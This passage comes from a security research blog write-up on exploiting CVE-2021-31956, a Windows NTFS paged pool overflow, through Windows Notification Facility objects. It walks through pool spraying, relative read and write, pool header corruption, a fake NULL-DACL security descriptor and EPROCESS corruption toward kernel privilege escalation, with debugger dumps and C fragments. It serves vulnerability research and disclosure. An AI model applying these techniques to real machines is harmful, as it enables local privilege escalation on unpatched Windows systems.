   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that both the vulnerable NTFS chunk and the WNF chunk can be positioned next to other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.
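A sketch of that corruption scan, with a local structure mirroring _WNF_STATE_DATA (the 4-byte _WNF_NODE_HEADER collapsed into a single field) and an illustrative helper name; in the real exploit each element would be read back via NtQueryWnfStateData rather than from a local array:

```c
#include <stdint.h>
#include <stddef.h>

/* Local mirror of _WNF_STATE_DATA (the Header is 4 bytes). */
typedef struct {
    uint32_t Header;
    uint32_t AllocatedSize;
    uint32_t DataSize;
    uint32_t ChangeStamp;
} WNF_STATE_DATA;

/* Returns the index of the first sprayed element whose ChangeStamp no
 * longer matches the stamp we set ourselves (i.e. the one the NTFS
 * overflow corrupted), or -1 if none differ. */
static ptrdiff_t find_corrupted(const WNF_STATE_DATA *objs, size_t count,
                                uint32_t expected_stamp)
{
    for (size_t i = 0; i < count; i++)
        if (objs[i].ChangeStamp != expected_stamp)
            return (ptrdiff_t)i;
    return -1;
}
```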

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below is some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.
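The reuse decision can be modelled as below; this is my own simplification of the logic, not the driver's code. Once AllocatedSize has been corrupted upwards, the copy length accepted by this check exceeds the real allocation, and the subsequent memcpy overruns it:

```c
#include <stdint.h>

/* Simplified model of ExpWnfWriteStateData's buffer reuse decision: the
 * existing allocation is reused (and Length bytes copied into it)
 * whenever the recorded AllocatedSize covers the incoming Length. */
static int reuses_existing_buffer(uint32_t allocated_size, uint32_t length)
{
    return length <= allocated_size;
}
```

For example, a genuine 0x10-byte allocation whose AllocatedSize field has been overwritten with 0x1000 will happily accept a 0x200-byte write.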

At this point it's worth noting that the relative write has not really given us anything more than we already had with the NTFS overflow. However, as the data can be both read and written back using this technique, it opens up the ability to read data, modify certain parts of it, and write it back.

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow. This wrong assumption led me to try to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve an arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of a 0x30 sized chunk WNF _POOL_HEADER.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is freed using our controlled free, we can force the chunk's address to be stored within the wrong lookaside list for its size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also of a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative writes.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagrammatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back from this minor PipeAttribute detour, and with the realisation that I could actually control the size of the vulnerable NTFS chunks, I started to investigate if it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur, the bounds checking within ExpWnfWriteStateData would pass.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore we can end up with our desired memory layout, with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address, as this was used within the in-the-wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and that the vulnerability could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal state name needs to match the external name being queried.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

The external version of the StateName is the internal version of the StateName XOR'd with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb

The key thing to realise here is that whilst Version, LifeTime and DataScope are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope either the Silo Globals or the Server Silo Globals are offset into to obtain v10, and this is then used as the Sequence, which is incremented by 1 each time.

Then in order to lookup a name instance the following code is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateName‘s of the objects which have been heap sprayed, you don’t necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers; however, the main caveat is that care needs to be taken to avoid triggering the safe unlinking protection.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due to the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide a fake security descriptor with the same values. This didn't work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).

Ok then! Let's just make the DACL NULL, so that the Everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

#include <windows.h>
#include <stdlib.h>

// Control = 0x800c decodes to SE_SELF_RELATIVE | SE_DACL_PRESENT |
// SE_DACL_DEFAULTED, matching the kernel-space descriptor seen above.
SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c;
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;  // DACL marked present but NULL: everyone gets full access

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that setting the StateData pointer to 0x6161616161616161 would cause a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, it is caught and the NT status -1073741819 (STATUS_ACCESS_VIOLATION) is propagated back to userland. This made initial debugging more challenging, as the code around that function is a significantly hot path and conditional breakpoints led to a huge program standstill.

Anyhow, typically after achieving an arbitrary write an attacker will either leverage to perform a data-only based privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following steps needed to be taken:

1) The internal StateName needed to match up correctly so that the correct external StateName could be found when required.
2) The security descriptor needed to pass the checks in ExpWnfCheckCallerAccess.
3) The DataSize and AllocatedSize offsets needed to hold values appropriate for the area of memory desired.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target KTHREAD structures PreviousMode member

2) Target the EPROCESS token

These approaches and their pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary, we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitives. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean-up and the continuation of the exploit.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

17 August 2021 at 08:05

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

